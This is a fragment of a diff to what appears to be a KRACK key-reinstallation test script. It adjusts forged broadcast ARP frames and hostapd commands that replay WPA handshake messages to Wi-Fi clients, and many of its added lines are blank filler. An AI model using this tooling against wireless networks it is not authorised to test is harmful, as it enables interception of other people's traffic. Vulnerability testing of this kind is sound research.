|
@@ -14,11 +14,23 @@ from libwifi import *
|
|
|
import sys, socket, struct, time, subprocess, atexit, select, os.path
|
|
|
from wpaspy import Ctrl
|
|
|
|
|
|
+
|
|
|
+
|
|
|
+
|
|
|
+
|
|
|
+
|
|
|
+
|
|
|
+
|
|
|
+
|
|
|
+
|
|
|
+
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
+
|
|
|
+
|
|
|
|
|
|
|
|
|
|
|
@@ -379,7 +391,7 @@ class KRAckAttackClient():
|
|
|
hostapd_command(self.hostapd_ctrl, cmd)
|
|
|
|
|
|
|
|
|
- request = Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(op=1, hwsrc=self.apmac, psrc=self.broadcast_sender_ip, pdst=clientip)
|
|
|
+ request = Ether(src=self.apmac, dst="ff:ff:ff:ff:ff:ff")/ARP(op=1, hwsrc=self.apmac, psrc=self.broadcast_sender_ip, pdst=clientip)
|
|
|
self.sock_eth.send(request)
|
|
|
client.broadcast_requests_sent += 1
|
|
|
log(INFO, "%s: sending broadcast ARP to %s from %s (sent %d ARPs this interval)" % (client.mac,
|
|
@@ -497,7 +509,7 @@ class KRAckAttackClient():
|
|
|
hostapd_command(self.hostapd_ctrl, "RESEND_M1 " + client.mac + " change-anonce")
|
|
|
|
|
|
|
|
|
- hostapd_command(self.hostapd_ctrl, "RESEND_M3 " + client.mac + ("maxrsc" if self.options.gtkinit else ""))
|
|
|
+ hostapd_command(self.hostapd_ctrl, "RESEND_M3 " + client.mac + (" maxrsc" if self.options.gtkinit else ""))
|
|
|
|
|
|
|
|
|
|
|
@@ -507,6 +519,7 @@ class KRAckAttackClient():
|
|
|
|
|
|
|
|
|
if client.vuln_bcast != ClientState.VULNERABLE and client.mac in self.dhcp.leases:
|
|
|
+ time.sleep(1)
|
|
|
self.broadcast_send_request(client)
|
|
|
|
|
|
|